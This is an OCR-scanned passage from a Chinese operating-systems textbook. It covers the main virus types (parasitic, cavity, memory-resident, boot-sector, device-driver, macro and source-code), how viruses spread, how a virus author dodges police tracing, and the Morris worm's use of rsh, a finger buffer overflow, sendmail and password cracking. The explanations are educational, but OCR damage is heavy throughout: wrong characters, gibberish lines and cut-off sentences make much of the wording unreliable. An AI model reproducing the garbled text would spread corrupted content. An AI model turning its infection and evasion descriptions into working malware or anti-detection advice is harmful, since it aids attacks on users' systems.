不 变 ， 这 样 可 以 协助 把 病毒 代码 隐藏 起 来 。 对 大 于 病毒 的 程序 来 说 ， 


感染 后 程序 大 小 将 保持 不 便 ; 但 对 小 于 病毒 大 小 的 程序 来 说 ， 感 染 后 
程序 将 变 大 。 多 数 病毒 都 比 大 多 数 程序 小 ， 所 以 这 不 是 一 个 严重 的 问 


题 。 


一 般 的 病毒 程序 并 不 长 (整个 程序 用 C 语 言 编写 不 超过 1 页 ， 文 本 
段 编 译 后 小 于 2KB) ， 汇 编 语 言 编写 的 版 本 将 更 小 。Ludwig (1998) 
曾经 给 出 了 一 个 感染 目录 里 所 有 文件 的 MS-DOS 病 毒 ， 用 汇编 语言 编写 
并 编译 后 仅 有 44 个 字 节 。 


稍 后 的 章 广 将 研究 反 病毒 程序 ， 这 种 反 病毒 程序 可 以 跟踪 病毒 并 
除去 它们 。 而 且 ， 在 图 9-27 里 很 有 趣 的 情况 是 ， 病 毒 用 来 查找 可 执行 文 
件 的 方法 也 可 以 补 反 病毒 程序 用 来 跟踪 被 感染 的 文件 并 最 终 清 除 病 
毒 。 感 染 机 制 与 反感 染 机 制定 相辅相成 的 ， 所 以 万 了 更 有 效 地 打击 病 
毒 ， 我 们 必须 详细 理解 病毒 工作 的 原理 。 


从 Virgil 的 观点 来 说 ， 病 毒 的 致命 问题 在 于 它 太 容易 个 发 现 了 。 毕 
况 当 被 感染 的 程序 运行 时 ， 病 毒 束 会 感染 更 多 的 文件 ， 但 这 时 该 程序 
就 并 不 能 正常 运行 ， 那 么 用 户 就 会 立即 发 现 。 所 以 ， 有 相当 多 的 病毒 
把 自己 附 在 正常 程序 里 ， 在 病毒 发 作 时 可 以 让 原来 的 程序 正常 工作 。 
这 类 病毒 叫做 寄生 病毒 (parasitic virus) 。 


寄生 病毒 可 以 附 在 可 执行 文件 的 前 端 、 后 端 或 者 中 间 。 如 果 附 在 
前 端 ， 病 毒 首 先 要 把 程序 复制 到 RAM 中 ， 把 自己 附加 到 程序 前 端 ， 然 
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程序 不 会 在 新 的 虚拟 地 址 里 运行 ， 所 以 病毒 要 么 在 程序 被 移动 后 重新 
为 该 程序 分 配 地 址 ， 要 么 在 完成 自己 的 操作 后 缩 回 到 虚拟 地 址 0。 


病毒 


可 执行 
程序 


可 执行 
程序 


可 执行 
程序 


起 始 地 址 


图 9-28 al 一段 可 执行 程序 ，b) 病 毒 在 前 端 ，c) 病 毒 在 后 端 ，d) 病 毒 
充 不 在 程序 里 的 多 余 空 间 里 


为 了 避免 从 前 端 装 入 病毒 代码 训 来 的 复杂 操作 ， 大 多 数 病毒 是 后 
端 装 入 的 ， 把 它们 上 自己 附 在 可 执行 程序 末端 而 不 是 前 端 ， 并 且 把 文件 
头 的 起 始 地 址 指向 病毒 ， 如 图 9-28c 所 示 。 现 在 病毒 要 根据 被 感染 程序 
的 不 同 在 不 同 的 虚拟 地 址 上 运行 ， 这 意味 着 Virgil 必 须 使 用 相对 地 址 ， 
而 不 是 绝对 地 址 来 保证 病毒 是 位 置 独立 的 。 对 资深 的 程序 员 来 说 ， 这 
样 做 并 不 难 ， 并 且 一 些 编译 器 根据 需要 也 可 以 完成 这 件 事 。 


复杂 的 可 执行 程序 格式 ， 如 Windows 里 的 .exe 文 件 和 UNIX 系 统 
几乎 所 有 的 二 进 制 格式 文件 都 拥有 多 个 文本 和 数据 段 ， 可 以 用 到 载 程 


序 在 内 存 中 迅速 把 这 些 段 组 装 和 分 配 。 在 有 些 系统 中 (如 Windows) , 
所 有 的 段 都 包含 多 个 512 字 节 单 元 。 如 果 某 个 段 不 满 ， 链 接 程 序 会 用 0 
填充 。 知 道 这 一 点 的 病毒 会 试图 隐藏 在 这 些 空洞 里 。 如 打 正 好 填 满 多 
余 的 空间 ， 如 图 9-28d 所 示 ， 整 个 文件 大 小 将 和 未 感染 的 文件 一 样 保持 
不 变 ， 不 过 却 有 了 一 个 附加 物 ， 所 以 隐 舍 的 病毒 是 位 运 的 病毒 。 这 类 
病毒 叫做 空 腔 病毒 (cavity virus) 。 当 然 如果 装载 程序 不 把 多 余部 分 装 
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4. 内 存 驻 留 病毒 


到 目前 为 止 ， 我 们 假设 当 被 感染 的 程序 运行 时 ， 病 毒 也 同时 运 
行 ， 然 后 将 控制 权 交 给 真正 的 程序 ， 最 后 退出 。 内 存 往 留 病毒 
(memory-resident virus) 与 此 相反 ， 它 们 总 是 驻 留 在 内 存 中 
(RAM) ， 要 么 藏 在 内 存 上 端 ， 要 么 藏 在 下 端的 中 断 变量 中 。 聪 明 的 
病毒 甚至 可 以 改变 操作 系统 的 RAM 分 布 位 图 ， 让 系统 以 为 病毒 所 在 的 
区 域 已 经 占用 ， 从 而 避免 了 被 其 他 程序 覆盖 。 


典型 的 内 存 驻 留 病 毒 通过 把 陷阱 或 中 断 向 量 中 的 内 容 复制 到 任意 
变量 中 之 后 ， 将 目 身 的 地 址 放置 其 中 ， 俘 获 陷阱 或 中 断 癌 量 ， 从 而 将 
该 陷阱 或 中 断 指 同 病毒 。 最 好 的 选择 是 系统 调用 陷阱 ， 这 样 病毒 束 可 
以 在 每 一 次 系统 调用 时 运行 〈 在 核心 态 下 ) 。 病 毒 运行 完 之 后 ， 通 过 
跳 转 到 所 保存 的 陷阱 地 址 重新 激活 真正 的 系统 调用 。 


为 什么 病毒 在 每 次 系统 调用 时 部 要 运行 呢 ? 这 是 因为 病毒 想 感 染 
程序 。 病 毒 可 以 等 待 直到 发 现 一 个 exec 系 统 调 用 ， 从 而 判断 这 是 一 个 日 
执行 二 进 制 (而 且 也 许 是 一 个 有 价值 的 ) 代码 文件 ， 于 是 决定 感染 
它 。 这 一 过 程 并 不 需要 大 量 的 磁 强 活动 ， 如 图 9-27 所 示 ， 所 以 难以 被 发 
现 。 捕 扣 所 有 的 系统 调用 也 给 了 病毒 潜在 的 能 力 ， 可 以 监视 所 有 的 数 
据 并 造成 种 种 危害 。 


5. 引 导 忆 区 病毒 


正如 我 们 在 第 5 章 所 讨论 的 ， 当 大 多 数 计算 机 开机 时 ，BIOS 读 引导 
磁盘 的 主 引 导 记 录放 入 RAM 中 并 运行 。 引 导 程序 判 断 出 哪 一 个 是 活动 
分 区 ， 从 该 分 区 读 取 第 一 个 届 区 ， 即 引导 局 区 ， 并 运行 。 随 后 ， 系 统 
要 么 装 入 操作 系统 要 么 通过 装载 程序 导入 操作 系统 。 但 是 ， 多 年 以 前 
Virgil 的 朋友 发 现 可 以 制作 一 种 病毒 履 兰 主 引 寻 记 录 或 引导 书 区 ， 并 能 
造成 灾难 性 的 后 果 。 这 种 叫做 引导 局 区 病毒 (boot sector virus) , Efi] 
现在 已 十 分 普 裔 了 。 


通常 引导 局 区 病毒 [包括 MBR ( 主 引 导 记 录 ) 病毒 ]， 首 先 把 真正 
的 引 寻 记录 书 区 复制 到 磁盘 的 安全 区 域 ， 这 样 承 能 在 完成 操作 后 正常 
引导 操作 系统 。Microsoft 的 磁盘 格式 化 工具 fdisk 往 往 跳 过 第 一 个 厂 
道 ， 所 以 这 是 在 Windows 机 亚 中 隐藏 引导 记录 的 好 地 方 。 另 一 个 办 法 是 
使 用 磁盘 内 任意 空 几 的 届 区 ， 然 后 更 新 坏 厕 区 列表 ， 把 隐藏 引导 记录 
的 司 区 标记 为 坏 珊 区。 实际 上 ， 由 于 病毒 相当 庞大 ， 所 以 它 也 可 以 把 


自身 剩余 的 部 分 伪装 成 坏 届 区 。 如 果 根 目录 有 足够 大 的 固定 空间 ， 如 
在 Windows 98 中 ， 根 目 孙 的 末端 也 是 一 个 隐藏 病毒 的 好 地 方 。 真 正 有 
攻击 性 的 病毒 甚至 可 以 为 引导 记录 局 区 和 自身 重新 分 配 人 磁盘 空间 ， 并 
相应 地 更 新 磁盘 分 布 位 图 或 空 帮 表 。 这 和 需要 对 操作 系统 的 内 部 数据 结 
构 有 详细 的 了 解 ， 不 过 Virgil 有 一 个 很 好 的 教授 专门 讲解 和 人 研究 操作 系 
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当 计 算 机 启动 时 ， 病 毒 把 自身 复制 到 RAM 中 ， 要 么 隐藏 在 顶部 ， 
要 么 在 未 使 用 的 中 断 向 量 中 。 由 于 此 时 计算 机 处 于 核心 态 ，MMU 处 于 
关闭 状态 ， 没 有 操作 系统 和 反 病 毒 程序 在 运行 ， 所 以 这 对 病毒 来 说 是 
天 赐 恨 机 。 当 一 切 准 备 就 绪 时 ， 病 毒 会 启动 操作 系统 ， 而 自己 则 往往 
驻 留 在 内 存 里 ， 所 以 它 能 够 监视 情况 变化 。 


然而 ， 存 在 一 个 如 何 获取 今后 对 系统 的 控制 权 的 问题 。 般 用 的 办 
法 要 利用 一 些 操 作 系 统管 理 中 断 问 量 的 技巧 。 如 Windows 系 统 在 一 次 中 
GH ATA APT Bo AA, ARERR A Px OTE 
序 ， 每 一 个 都 获取 所 需 的 中 断 间 量 。 这 一 过 程 要 持续 一 分 钟 左 右 。 


这 种 设计 给 了 病毒 以 可 乘 之 机 。 它 可 以 捕获 所 有 中 断 问 量 ， 如 图 9- 
29a 所 示 。 当 加 载 驱动 程序 时 ， 部 分 回 量 被 覆盖 ， 但 是 除非 时 钟 驱动 程 
序 首 先 被 载 入 ， 否 则 会 有 大 量 的 时 钟 中 断 用 来 激活 病毒 。 丢 失 了 打印 
机 中 断 的 情况 如 网 9-29b 所 示 。 只 要 病毒 发 现 有 茶 一 个 中 断 癌 量 已 和 被覆 
次 ， 它 束 再 次 覆盖 该 问 量 ， 因 为 这 样 做 是 安全 的 (kik, BEEP 


向 量 在 启动 时 被 覆盖 了 好 几 次 ，Virgil 很 明白 是 怎么 回 事 ) 。 重 新 夺回 
打印 机 控制 权 的 示意 图 如 图 9-29c 所 示 。 在 所 有 的 一 切 都 加 载 完毕 后 ， 
病毒 恢复 所 有 的 中 断 癌 量 ， 而 仅仅 为 目 己 保留 了 系统 调用 陷阱 癌 量 。 
至 此 ， 内 存 往 留 病 毒 控 制 了 系统 调用 。 事 实 上 ， 大 多 数 内 存 往 留 病毒 


忠 是 这 样 开始 运行 的 。 


操作 系统 操作 系统 操作 系统 


病毒 


病毒 


Al 9-29 a) 病 毒 捕 获 了 所 有 的 中 断 癌 量 和 陷阱 癌 量 后 ; b) 操 作 系统 夺 
回 了 打印 机 中 断 问 量 ，c) 病 毒 意识 到 打印 机 回 量 的 丢失 并 重新 夺回 了 挖 
制 权 


6. 设 备 驱动 病毒 


深入 内 存 有 点 像 洞穴 探险 一 一 你 不 得 不 扭曲 号 体 前 进 并 时 刻 担心 
物体 硬 落 在 头 上 。 如 果 操 作 系统 能 够 友好 并 光明 正大 地 装 入 病毒 ， 那 
么 事情 束 好 办 多 了 。 其 实 只 要 那么 一 上 后 点 努力 ， 束 可 以 达到 这 一 目 


标 。 解 决 办 法 是 感染 设备 驱动 程序 ， 这 类 病毒 叫做 设备 驱动 病毒 
(device driver virus) 。 在 Windows 和 有 些 UNIX 系 统 中 ， 设 备 驱 动 程序 
是 位 于 磁 副 里 或 在 启动 时 被 加 载 的 可 执行 程序 。 如 果 有 一 个 驱动 程序 
被 寄生 病毒 感染 ， 病 毒 束 能 够 在 每 次 局 动 时 被 正大 光明 地 载 入。 而 
且 ， 当 驱动 程序 运行 在 核心 态 下 ， 一 旦 被 加 载 就 会 调用 病毒 ， 从 而 给 
病毒 获取 系统 调用 的 陷阱 向 量 的 机 会 。 这 样 的 情况 促使 我 们 限制 驱动 
程序 运行 在 用 户 态 ， 这 样 的 话 即使 驱动 程序 被 病毒 感染 ， 它 们 也 不 能 
像 在 内 核 态 的 驱动 程序 一 样 ， 造 成 很 大 的 危害 。 


7. 宏 病毒 


St 


许多 应 用 程序 ， 如 Word 和 Excel， 人 允许 用 户 把 一 大 串 命 令 写 入 宏文 
件 ， 以 便 日 后 一 次 按键 就 能 够 执行 。 宏 可 附 在 菜单 项 里 ， 这 样 当 羔 单 
项 被 选中 时 宏 就 可 以 运行 。 在 Microsoft Office 中 ， 宏 可 以 包含 完全 用 
Visual Basic 编 程 语言 编写 的 程序 。 宏 程序 是 解释 执行 而 不 是 编译 执行 
的 ， 但 解释 执行 只 影响 运行 速度 而 不 影响 其 执行 的 效果 。 宏 可 以 是 针 
对 特定 的 文档 ， 所 以 Office 就 可 以 为 每 一 个 文档 建立 宏 。 


现在 我 们 看 一 看 问题 所 在 。Virgil 在 Word 里 建立 了 一 个 文档 并 创建 
J (OPEN FILE 功 能 的 宏 。 这 个 宏 合 有 一 个 宏 病 毒 代 码 。 然 后 他 将 
文档 发 送 给 受害 人 ， 受 害 人 很 自然 地 打开 文件 (假设 E-mail 程序 还 没有 
打开 文件 ) ， 导 致 OPEN FILE 安 开始 运行 。 既 然 宏 可 以 包含 任意 程 
序 ， 它 就 可 以 做 任何 事情 ， 如 感染 其 他 的 Word 文 档 ， 删 除 文件 等 。 对 


Microsoft 来 说 ，Word 在 打开 含有 宏 的 文件 时 确实 能 给 出 警告， 但 大 多 
数 用 户 并 不 理解 警告 的 含义 并 继续 执行 打开 操作 。 而 且 ， 合 法 文件 也 
会 包含 宏 。 还 有 很 多 程序 其 至 不 给 出 警告 ， 这 样 就 更 难以 发 现 病 毒 
T= 


随 着 E-mail 附 件数 量 的 增长 ， 发 送 嵌 有 安 病毒 的 文档 成 为 越 来 越 严 
重 的 问题 。 比 起 把 真正 的 引导 扇 区 隐藏 在 坏 块 列表 以 及 把 病毒 藏 在 中 
断 向 量 里 ， 这 样 的 病毒 更 容易 编写 。 这 意味 着 更 多 缺乏 专业 知识 的 人 
都 能 制造 病毒 ， 从 而 降低 了 病毒 产品 的 质量 ， 给 病毒 制造 者 带 来 了 坏 
名 声 。 


8. 源 代码 病毒 


寄生 病毒 和 引导 区 病毒 对 操作 系统 平台 有 很 高 的 依赖 性 ;文件 病 
毒 的 依赖 性 就 小 得 多 (Word 运 行 在 Windows 和 Macintosh 上 ， 但 不 是 
UNIX) 。 最 具 移 植 性 的 病毒 是 源 代 码 病 毒 (source code virus) 。 请 想 
象 图 9-27， 若 该 病毒 不 是 寻找 可 执行 二 进 制 文件 ， 而 是 寻找 C 语 言 程序 
并 加 以 改变 ， 则 仅仅 改动 一 行 即 可 (调用 access) 。infect 过 程 可 以 在 每 
个 源 程 序 文件 头 插 入 下 面 一 行 : 


#include<virus.h> 


还 可 以 插入 下 面 一 行 来 激活 病毒 : 


run_virus(); 


判断 在 什么 地 方 插入 需要 对 C 程 序 代 码 进行 分 机 ， 插 入 的 地 方 必 须 
能 够 允许 合法 的 过 程 调用 并 不 会 成 为 无 用 代码 (如 插入 在 retum 语 句 后 
面 ) 。 插 入 在 注释 语句 里 也 没什么 效果 ， 揪 入 在 循环 语句 里 倒 可 能 是 
个 极 好 的 选择 。 假 设 能 够 正确 地 插入 对 病毒 代码 的 调用 (如 正好 在 
main 过 程 结束 前 ， 或 在 return 语 句 结束 前 ) ， 当 程序 被 编译 时 就 会 从 
virus.h 处 (虽然 proj.h 可 能 会 引起 更 少 的 注意 获得 病毒 。 


当 程 序 运行 时 ， 病 毒 也 被 调用 。 病 毒 可 以 做 任何 操作 ， 如 查找 并 
感染 其 他 的 C 语 言 程序 。 一 旦 找到 一 个 C 语 言 程序 ， 病 毒 束 插入 上 面 两 
行 代码 ， 但 这 样 做 仅 对 本 地 计算 机 有 效 ， 并 且 virus.h 必 须 安放 受 当 。 要 
使 病毒 对 远程 计算 机 也 奏效 ， 程 序 中 必须 包括 所 有 的 病毒 源 代码 。 这 
可 以 通过 把 源 代码 作为 初始 化 后 子 符 串 来 实现 ， 特 别 是 使 用 一 串 32 位 
的 十 六 进 制 整数 来 防止 他 人 识破 企图 。 字 符 串 也 许 会 很 长 ， 但 是 对 于 
今天 的 大 型 代码 而 言 ， 这 是 可 以 轻易 实现 的 。 


对 初学 读 首 来 说 ， 所 有 这 些 方法 看 起 来 都 比较 复 淋 。 有 人 也 许 会 
怀疑 这 样 做 是 否 在 操作 上 可 行 。 事 实 上 是 可 行 的 。Virgil 是 极为 出 色 的 
程序 员 ， 而 且 他 手头 有 许多 空闲 时 间 。 读 者 可 以 看 看 当地 的 报纸 就 知 
ET? 


9. 病 毒 如 何 传播 


病毒 的 传播 需要 很 多 条 件 。 让 我 们 从 最 古典 的 方式 谈 起 。Virgil 编 
写 了 一 个 病毒 ， 把 它 放 进 了 自己 的 程序 〈 或 窃取 来 的 程序 ) 里 ， 然 后 
开始 分 发 程序 ， 如 放 入 共享 软件 站 点 。 最 后 ， 有 人 下 载 并 运行 了 程 
序 。 这 时 有 好 几 种 可 能 。 病 毒 可 能 开始 感染 硬盘 里 的 大 多 数 文件 ， 其 
中 有 些 文件 被 用 户 共享 给 了 自己 的 朋友 。 病 毒 也 可 以 试图 感染 硬 表 的 
引导 局 区 。 一 旦 引导 届 区 被 感染 ， 号 很 容易 在 核心 态 下 放置 内 存 驻 留 
病毒 。 


现在 ，Virgil 也 可 以 利用 其 他 更 多 的 方式 。 可 以 用 病毒 程序 来 查看 
被 感染 的 计算 机 是 否 连接 在 局 域 网 上 ， 如 一 台 机 器 很 可 能 属于 某 个 公 
司 或 大 学 的 。 然 后 ， 就 可 以 通过 该 局 域 网 感染 所 有 服务 器 上 未 被 保护 
的 文件 。 这 种 感染 不 会 扩散 到 已 被 保护 的 文件 ， 但 是 会 让 被 感染 的 文 
件 运 行 起 来 十 分 奇怪 。 于 是 ， 运 行 这 类 程序 的 用 户 会 寻求 系统 管理 员 
的 帮助 ， 系 统管 理 员 会 亲自 试验 这 些 奇怪 的 文件 ， 看 看 是 怎么 会 
如 采 系 统管 理 员 此 时 用 超级 用 户 登 录 ， 病 毒 会 感染 系统 代码 、 设 备 驱 
动 程序 、 操 作 系 统 和 引导 局 区 。 犯 类 似 这 样 的 一 个 错误 ， 就 会 危及 局 
域 网 上 所 有 计算 机 的 安全 。 


运行 在 局 域 网 上 的 计算 机 通常 有 能 力 通 过 Internet 或 私人 网 络 登 录 
到 远程 计算 机 上 ， 或 者 其 至 有 权 无 须 登录 就 远程 执行 命令 。 这 种 能 力 
为 病毒 提供 了 更 多 传播 的 机 会 。 所 以 往往 一 个 微小 的 错误 殊 会 感染 整 


个 公司 。 要 避免 这 种 情况 ， 所 有 的 公司 应 该 制定 统一 的 策略 防止 系统 


管理 员 犯 错误 。 


另 一 种 传播 病毒 的 方法 是 在 经 常 发 布 程序 的 USENET 新 闻 组 或 网 站 
上 张贴 已 被 感染 病毒 的 程序 。 也 可 以 建立 一 个 需要 特别 的 浏览 器 插件 
的 网 页 ， 然 后 确保 插件 被 病毒 感染 上 。 


还 有 一 种 攻击 方式 古 把 感染 了 病毒 的 文档 通过 E-mail 方式 或 
USENET 新 闻 组 方式 发 送 给 他 人 ， 这 些 文档 被 作为 邮件 的 附件 。 人 们 从 
未 想到 会 去 运行 一 个 陌生 人 邮 给 他 们 的 程序 ， 他 们 也 许 没 有 想到 ， 点 
击 打开 附件 导致 在 自己 的 计算 机 上 释放 了 病毒 。 更 糟 的 是 ， 病 毒 可 以 
寻找 用 户 的 邮件 地 址 禾 ， 然 后 把 目 己 转发 给 地 址 簿 里 所 有 的 人 ， 通 般 
这 些 邮件 是 以 看 上 去 合法 的 或 有 趣 的 标题 开头 的 。 例 如 : 


Subject: Change of plans 
Subject: Re: that last e-mail 
Subject: The dog died last night 
Subject: I am seriously ill 
Subject: I love you 


当 邮 件 到 达 时 ， 收 信人 看 到 发 件 人 是 朋友 或 同事 ， 就 不 会 怀疑 有 
问题 。 而 一 旦 邮件 被 打开 束 太 蜡 了 。“ILOVE YOU” 病 毒 在 2000 年 6 月 
就 是 通过 这 种 方法 在 世界 范围 内 传播 的 ， 并 导致 了 数 十 亿美 元 的 损 
DN o 


与 病毒 的 传播 相 联 系 的 是 病毒 技术 的 传播 。 在 Internet 上 有 多 个 病 
毒 制造 小 组 积极 地 交流 ， 相 互 帮 助 开 发 新 的 技术 、 工 具 和 病毒 。 他 们 
中 的 大 多 数 人 可 能 是 对 病毒 有 乌 好 的 人 而 不 是 职业 罪犯 ， 但 带 来 的 后 
革 却 旦 灾难 性 的 。 另 一 类 病毒 制造 者 是 军人 ， 他 们 把 病毒 作为 洪 在 的 
战争 武 絮 来 破坏 政和 人 的 计算 机 系统 。 


与 病毒 传播 相关 的 另 一 个 话题 是 逃避 检测 。 监 狱 的 计算 设施 非常 
差 ， 所 以 Virgil 宁 愿 避 开 他 们 。 如 有 果 Virgil 将 最 初 的 病毒 从 家 里 的 计算 机 
张贴 到 网 上 ， 残 会 产生 和 危险。 一 旦 攻击 成 功 ， 和 警察 现 能 通过 最 近 病 毒 
出 现 过 的 时 间 信 息 跟 躁 查 找 ， 因 为 这 些 信 息 最 有 可 能 接近 病毒 来 源 。 


为 了 减少 骏 露 ，Virgil 可 能 会 通过 一 个 偏远 城市 的 网 吧 登 孙 到 
Internet 上 。 他 既 可 以 把 病毒 市 到 软盘 上 目 己 打 开 ， 也 可 以 在 没有 软 磁 
盘 转 动 絮 的 情况 下 利用 隔壁 女士 的 计算 机 读 取 book.doc 文 件 以 便 打 印 。 
一 旦 文件 到 了 Virgil 的 硬盘 ， 他 束 将 文件 名 改 为 Virus.exe 并 运行 ， 从 而 
感染 整个 局 域 网 ， 并 且 让 病毒 在 两 周 后 激活 ， 以 防 警 察 列 出 一 周 内 进 
出 该 城市 机 场 的 可 疑 人 员 和 名 单 。 


另 一 个 方法 是 不 使 用 软盘 驱动 化 ， 而 通过 远程 FTP 站 点 放置 病毒 。 
或 者 市 一 台 笔 记 本 电脑 连接 在 网 吧 的 Ethenet 或 USB 问 口上， 而 网 吧 里 
确实 有 这 些 服 务 设备 供 携 市 笔记 本 电脑 的 游客 每 天 查阅 目 己 的 电子 邮 
fpe 


$ 


关于 病毒 还 有 很 多 需要 讨论 的 内 容 ， 尤 其 是 他 们 如 何 隐藏 目 己 以 
及 杀毒 软件 如 何 将 之 发 现 。 在 本 章 后 面 讨 论 恶 意 软 件 防 护 的 时 候 我 们 


会 回 到 这 个 话题 。 


9.7.3 ”蠕虫 


互联 网 计算 机 发 生 的 第 一 次 大 规模 安全 灾难 是 在 1988 年 的 11 月 2 
日 ， 当 时 Cornell 大 学 毕业 生 Robert Tappan Morris 在 Internet 网 上 发 布 了 
一 种 蠕虫 程序 ， 结 果 导 致 了 全 世界 数 以 千 计 的 大 学 、 企 业 和 政府 实验 
室 计 算 机 的 瘫痪 。 这 也 导致 了 一 直 示 能 平息 的 争论 。 我 们 稍 后 将 重点 
描述 。 具 体 的 技术 细节 请 参阅 Spafford 的 论文 〈1989 版 ) ， 有 关 这 一 事 
件 的 警方 惊险 描述 请 参见 Hafner 和 Markoff 的 书 (1991 版 )。 


故事 发 生 在 1988 年 的 某 个 时 候 ， 当 时 Morris 在 Berkeley 大 学 的 
UNIX 系 统 里 发 现 了 两 个 bug， 使 他 能 不 经 授权 接触 到 Internet 网 上 所 有 
的 计算 机 。Morris 完 全 通过 目 身 努力 ， 写 了 一 个 能 够 目 我 复制 的 程 
序 ， 叫 做 蠕虫 (worm) 。 里 虫 可 以 利用 UNIX 的 bpug， 在 数秒 种 内 目 我 
复制 ， 然 后 迅速 传染 到 所 有 的 机 器 。Meorris 为 此 工作 了 好 几 个 月 ， 并 
想方设法 调试 以 逃避 跟踪 。 


现在 还 不 知道 1988 年 11 月 2 日 的 发 作 是 否 是 一 次 实验 ， 还 是 一 次 真 
正 的 攻击 。 不 管 怎 么 说 ， 病 毒 确实 让 大 多 数 Sun 和 VAX 系 统 在 数 小 时 
内 臣服 。Morris 的 动机 还 不 得 而 知 ， 也 有 可 能 这 是 他 开 的 一 个 高 科技 
玩笑 ， 但 由 于 编程 上 的 错误 导致 局 面 无 法 控制 。 


从 技术 上 来 说 ， 蠕 虫 包 含 了 两 部 分 程序 ， 引 导 程序 和 蠕虫 本 映 。 
引导 程序 是 99 行 的 称 为 11.c 的 程序 ， 它 在 被 攻击 的 计算 机 上 编译 并 运 
行 。 一 旦 发 作 ， 它 就 在 源 计算 机 与 宿主 机 之 间 建 立 连接 ， 上 传 蠕虫 主 
体 并 运行 。 在 花费 了 一 番 周 折 隐 藏 目 身后 ， 蠕 虫 会 查看 新 入 主机 的 路 
由 表 看 它 是 否 连 接 到 其 他 的 机 右上， 通过 这 种 方式 蠕虫 把 引导 程序 传 
播 到 所 有 相连 的 机 器 。 


蠕虫 在 感染 痢 机 器 时 有 三 种 方法 。 方 法 1 是 试图 使 用 rsh 命 令 运行 
远程 shell 程 序 。 有 些 计算 机 信任 其 他 机 絮 ， 人 允许 其 他 机 器 不 经 校 验 就 
可 运行 rsh 命 令 。 如 采 方 法 一 可 行 ， 远 程 shell] 会 上 传 蠕虫 主体 ， 并 从 那 
里 继续 感染 新 的 计算 机 。 


方法 2 是 使 用 一 种 在 所 有 系统 上 叫做 finger 的 程序 ， 该 程序 允许 
Internet 上 任何 地 方 的 用 户 通过 键入 


finger name@site 


PRAT AB AEA ATE ES PAS MM o RES SS La: 个 
AGE > ERG ` LPM AEHODE > TESTS» RA SIUM 
信息 。 这 有 点 像 电 话 本 。 


finger 是 这 样 工作 的 。 在 每 个 站 点 有 一 个 叫做 finger 守 护 进程 的 后 
台 进 程 ， 它 一 直 保 持 运 行 状态 ， 监 视 并 回答 所 有 来 目 因 特 网 的 查询 。 


蠕虫 所 做 的 是 调用 finger， 并 用 一 个 精心 编写 的 、 由 536 个 特殊 字 节 组 
成 的 字符 串 作 为 参数 。 这 一 长 串 覆 震 了 和 守护 进程 的 缓冲 和 栈 ， 如 图 9- 
24c 所 示 。 这 里 所 利用 的 缺陷 是 守护 进程 没有 检查 出 缓冲 区 和 栈 的 洲 出 
情形 。 当 守护 进程 从 它 原 先 获得 请 求 时 所 在 的 过 程 中 返回 时 ， 它 返回 
的 不 是 main， 而 是 栈 上 536 字 下 中 包含 的 过 程 。 该 过 程 试图 运行 sh。 如 
果 成 功 ， 蠕 虫 束 掌握 了 被 攻击 计算 机 里 运行 的 shell 。 


方法 3 是 依靠 在 电子 邮件 系统 里 的 sendmail 程 序 ， 利 用 它 的 bug 允 
许 蠕虫 发 送 引 导 程 序 的 备份 并 运行 。 


蠕虫 一 旦 出 现 就 准备 破解 用 户 密 码 。Morris 没 有 在 这 方面 做 大 量 
的 有 关 研 究 。 他 所 做 的 是 问 自 己 的 父亲 ， 一 名 美国 国家 安全 局 (该 局 
是 美国 政府 的 密码 破解 机 构 ) 的 安全 专家 ， 要 一 份 Morris Sr 和 Ken 
Thompson 十 年 前 在 Bell 实 验 室 合 著 的 经 典 论 文 (Morris 和 
Thompson,1979) 。 每 个 被 破译 的 密码 允许 蠕虫 登录 到 任何 该 密码 所 有 
者 具有 账号 的 计算 机 上 。 


每 一 次 蠕虫 访问 到 新 的 机 吉 ， 它 束 查 看 是 否 有 其 他 版 本 的 蜂 虫 已 
经 存活 。 如 果 有 ， 新 的 版 本 束 退 出 ， 但 七 次 中 有 一 次 新 蠕虫 不 会 退 
出 。 即 使 系统 管理 员 局 动 了 旧 里 虫 来 已 弄 新 蠕虫 也 是 如 此 ， 这 大 概 是 
为 了 给 目 己 做 宣传 。 结 采 ， 七 次 访问 里 的 一 次 产生 了 太 多 的 蠕虫 ， 导 
致 了 所 有 被 感染 机 天 的 停机 : 它们 被 蠕虫 感染 了 。 如 果 Morris 放 弃 这 
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么 容易 被 发 现 了 。 


当 Morris 的 一 个 朋友 试图 向 纽约 时 报 记 者 John Markoff 说 明 整 个 事 
件 是 个 意外 ， 蠕 虫 古 无 害 的 ， 作 者 也 很 遗憾 等 的 时 候 ，Morris 被 捕 
T ° Morris 的 朋友 不 经 意 地 流露 出 罪犯 的 登录 名 古 rtm。 把 rtm 转 换 成 用 
尸 名 十 分 简单 一 一 Markoff 所 要 做 的 只 古 运行 finger。 第 二 天 ， 改 事 上 
了 头条 新 闻 ， 三 天 后 影响 力 甚 至 超过 了 总 统 选举 。 


Morris 被 联邦 法 院 审判 并 证 实 有 徘 。 他 被 判 10 000 美 元 到 款 ， 三 年 
察看 和 400 小 时 的 社区 服务 。 他 的 法 律 费 用 可 能 超过 了 150 000 美 元 。 
这 一 判决 导致 了 大 量 的 争论 。 许 多 计算 机 业界 人 员 认 为 他 是 个 聪明 的 
人 研究生， 只 不 过 屎 作 剧 超出 了 控制 。 蠕 虫 程序 里 没有 证 据 表 明 Morris 
试图 偷 穷 或 贤 坏 什 么 。 而 其 他 人 认为 Morris 是 个 严重 的 罪犯 必须 蹲 监 
狄 。Morris 后 来 在 哈佛 大 学 获得 了 博士 学 位 ， 现 在 他 是 一 名 有 奔 省 理工 
学 院 的 教授 。 


这 一 事件 导致 的 永久 结果 是 建立 了 计算 机 应 急 响 应 机 构 
(Computer Emergency Response Team, CERT) ， 这 是 一 个 发 布 病毒 
入 侵 报告 的 中 心机 构 ， 有 多 名 专家 分 析 安 全 问题 并 设计 补丁 程序 。 
CERT 有 了 自己 的 下 载 网 站 ，CERT 收 集 有 关 会 受到 攻击 的 系统 缺陷 方 
面 的 信息 并 告知 如 何 修复 。 重 要 的 是 ， 它 把 这 类 信息 周期 发 布 给 
Iternet 上 的 数 以 千 计 的 系统 管理 员 。 但 是 ， 某 些 别有用心 的 人 (可 能 


假装 成 系统 管理 员 ) 也 可 以 得 到 关于 系统 bug 的 报告 ， 并 在 这 些 bug 修 
复 之 前 花费 数 小 时 (或 数 天 ) 寻找 破门 的 捷径 。 


从 Morris 里 虫 出 现 开 始 ， 越 来 越 多 种 类 的 蠕虫 病毒 出 现在 网 络 
上 。 这 些 蠕虫 病毒 的 机 制 与 Morris 一 样 ， 所 不 同 之 处 只 是 利用 系统 
不 同 软件 的 不 同 漏洞 。 由 于 蠕虫 能 够 自我 复制 ， 因 此 扩散 趋势 比 病毒 
